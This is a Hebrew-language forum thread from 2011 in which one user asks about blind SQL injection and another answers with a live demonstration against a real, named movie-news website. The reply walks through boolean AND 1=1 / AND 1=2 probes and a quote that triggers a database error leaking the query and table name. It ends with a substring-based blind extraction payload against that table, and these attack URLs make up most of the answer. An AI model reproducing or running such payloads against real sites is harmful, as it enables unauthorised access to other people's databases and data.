sql injection

**dolevzZz** · 20-05-2011, 23:41

אם אין sqli באתר
אפשר לעשות blind sql ?
ואיך אני ידע שאני יוכל לשלוף נתונים בעזרת blind sql
ושהאתר לא חוסם את זה

**Zer0Day** · 21-05-2011, 09:16

אני ממליץ לך קודם ללמוד עבודה עם מסד נתונים ואז ללמוד את כל השטויות האלה .
נניח קח את האתר הזה לדוגמה -

קוד:

http://www.comingsoon.net/news/movienews.php?id=56475

עכשיו נוסיף AND 1=1 בכתובת .

קוד:

http://www.comingsoon.net/news/movienews.php?id=56475%20AND%201=1

זה הביא לנו את הערך TRUE
עכשיו AND 1=2

קוד:

http://www.comingsoon.net/news/movienews.php?id=56475%20AND%201=2

הביא לנו את הערך FALSE
עכשיו נחזור להתחלה.. נוסיף גרש (') בכתובת

קוד:

http://www.comingsoon.net/news/movienews.php?id=56475%27

תראה את הפלט שזה הביא לנו

קוד PHP:


DB Error: syntax error SELECT user_id, status FROM NEX_ARTICLES WHERE article_id = 56475'

והגענו לזה -

קוד:

http://www.comingsoon.net/news/movienews.php?id=56475%20AND%20(select%20substring(concat(1,article_id),1,1)%20from%20NEX_ARTICLES%20limit%200,1%20)=1

בכ"מ, כמו שציינתי למעלה אני ממליץ לך לעבוד קודם עם מסד נתונים ואז להתעסק בכל השטויות האלה..

שם משתמש		זכור אותי	רישום לאתר
סיסמה		שכחת סיסמה?

קהילות פורומים, הורדות, יעוץ ותמיכה